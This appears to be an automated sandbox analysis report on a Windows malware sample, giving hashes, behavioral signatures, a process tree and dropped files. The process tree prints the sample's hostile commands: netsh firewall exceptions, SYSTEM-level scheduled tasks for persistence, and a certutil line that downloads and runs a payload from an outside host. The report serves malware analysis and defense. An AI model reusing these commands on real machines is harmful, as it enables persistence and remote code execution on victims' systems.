Analysis
- max time kernel: 23s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 24-05-2022 03:13
Static task: static1
Behavioral task: behavioral1
- Sample: 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe
- Resource: win7-20220414-en
Behavioral task: behavioral2
- Sample: 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe
- Resource: win10v2004-20220414-en
General
- Target: 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe
- Size: 3.8MB
- MD5: 384c8fe4b39ea4b83c8eec594d1851f1
- SHA1: 6d41e9496c2dc79c5b46fe33133b764aaa8a6e64
- SHA256: 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04
- SHA512: ddd9b07cbbfeee5c6044093b293bb4b176497f9a0ed8850f55729f65771387a7571c373d614491b8c17d2ce589e4d13aacf4b78e754da9aa6424556713b1cfd4
Malware Config
Signatures
- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoCs)
  Processes:
  | description          | pid  | process     | target process |
  | PID 2964 created 740 | 2964 | svchost.exe | 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe |
- Modifies Windows Firewall (1 TTPs)
- Modifies boot configuration data using bcdedit (1 IoCs)
  Processes:
  | pid  | process     |
  | 2320 | bcdedit.exe |
- Program crash (2 IoCs)
  Processes:
  | pid  | pid_target | process      | target process |
  | 4636 | 740        | WerFault.exe | 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe |
  | 868  | 2260       | WerFault.exe | 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe |
- Creates scheduled task(s) (1 TTPs, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes:
  | pid  | process |
  | 740  | 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe |
  | 740  | 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe |
  | 2260 | 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe |
  | 2260 | 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe |
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes:
  | description                   | pid  | process |
  | Token: SeDebugPrivilege       | 740  | 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe |
  | Token: SeImpersonatePrivilege | 740  | 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe |
  | Token: SeTcbPrivilege         | 2964 | svchost.exe |
  | Token: SeTcbPrivilege         | 2964 | svchost.exe |
- Suspicious use of WriteProcessMemory (7 IoCs)
  Processes:
  | description                      | pid  | process     | target process |
  | PID 2964 wrote to memory of 2260 | 2964 | svchost.exe | 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe |
  | PID 2964 wrote to memory of 2260 | 2964 | svchost.exe | 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe |
  | PID 2964 wrote to memory of 2260 | 2964 | svchost.exe | 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe |
  | PID 2260 wrote to memory of 1732 | 2260 | 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe | cmd.exe |
  | PID 2260 wrote to memory of 1732 | 2260 | 57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe | cmd.exe |
  | PID 1732 wrote to memory of 1816 | 1732 | cmd.exe     | netsh.exe |
  | PID 1732 wrote to memory of 1816 | 1732 | cmd.exe     | netsh.exe |
Processes (tree; indentation shows parent/child depth)
- Image: C:\Users\Admin\AppData\Local\Temp\57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe"
  Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - Image: C:\Users\Admin\AppData\Local\Temp\57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\57c1859eda4e09e6c1e4e7473c182b307efc4a2e7ca31bd04835d9260e604a04.exe"
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
    - Image: C:\Windows\system32\cmd.exe
      Command line: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      Signatures: Suspicious use of WriteProcessMemory
      - Image: C:\Windows\system32\netsh.exe
        Command line: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
    - Image: C:\Windows\system32\cmd.exe
      Command line: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes"
      - Image: C:\Windows\system32\netsh.exe
        Command line: netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes
    - Image: C:\Windows\rss\csrss.exe
      Command line: C:\Windows\rss\csrss.exe ""
      - Image: C:\Windows\SYSTEM32\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
        Signatures: Creates scheduled task(s)
      - Image: C:\Windows\SYSTEM32\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        Signatures: Creates scheduled task(s)
      - Image: C:\Windows\system32\bcdedit.exe
        Command line: C:\Windows\Sysnative\bcdedit.exe /v
        Signatures: Modifies boot configuration data using bcdedit
      - Image: C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
    - Image: C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 740
      Signatures: Program crash
  - Image: C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 740 -s 616
    Signatures: Program crash
- Image: C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
  Signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
- Image: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 740 -ip 740
- Image: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2260 -ip 2260
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
  Filesize: 1.7MB
  MD5: 13aaafe14eb60d6a718230e82c671d57
  SHA1: e039dd924d12f264521b8e689426fb7ca95a0a7b
  SHA256: f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
  SHA512: ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
- C:\Windows\rss\csrss.exe
  Filesize: 1.8MB
  MD5: f6ef2297c55136864abd8e029b895b33
  SHA1: 569a4d79fa6cf994b54cd9a2d17663fab3fe66b6
  SHA256: 4df9cb6a10836c093dbd48c4be8bb1555bed88946e46d7758bfe35a4205a82c9
  SHA512: 59ae7cee1d6f2ebd5a038a2b30c9268afce25392286694d2a880e06f5de47d365c88c8f3db67e401ae155551a1115e9590d13ba15b44d004797ba928cb237dc5
- C:\Windows\rss\csrss.exe
  Filesize: 1.8MB
  MD5: f2e1db6684475c51a24261ecaed827a5
  SHA1: 0b7051dae61ccfd30ae55a381da6f4963bebfa21
  SHA256: 50af99d65f5c8391e7f8d31f5c2f9344dae2c7364424d111e78a8e7856a697e6
  SHA512: 7cedaeffdb508e6d7c8a5cc6681131e73a4f518927cf01dffa75495a8e9f48d84a272343ed433c791567ba8654781d487d5241b1cce149a3d9b1c02988e4bd50
- memory/116-145-0x0000000000000000-mapping.dmp
- memory/740-131-0x0000000003010000-0x0000000003705000-memory.dmp
  Filesize: 7.0MB
- memory/740-132-0x0000000000400000-0x0000000000BDA000-memory.dmp
  Filesize: 7.9MB
- memory/740-130-0x0000000002C64000-0x000000000300A000-memory.dmp
  Filesize: 3.6MB
- memory/1732-136-0x0000000000000000-mapping.dmp
- memory/1816-137-0x0000000000000000-mapping.dmp
- memory/1980-139-0x0000000000000000-mapping.dmp
- memory/2260-135-0x0000000000400000-0x0000000000BDA000-memory.dmp
  Filesize: 7.9MB
- memory/2260-134-0x0000000002938000-0x0000000002CDE000-memory.dmp
  Filesize: 3.6MB
- memory/2260-133-0x0000000000000000-mapping.dmp
- memory/2320-150-0x0000000000000000-mapping.dmp
- memory/3756-146-0x0000000000000000-mapping.dmp
- memory/3836-148-0x0000000000000000-mapping.dmp
- memory/4484-138-0x0000000000000000-mapping.dmp
- memory/5076-140-0x0000000000000000-mapping.dmp
- memory/5076-144-0x0000000003100000-0x00000000037F5000-memory.dmp
  Filesize: 7.0MB
- memory/5076-143-0x0000000002D00000-0x00000000030A6000-memory.dmp
  Filesize: 3.6MB
- memory/5076-147-0x0000000000400000-0x0000000000BDA000-memory.dmp
  Filesize: 7.9MB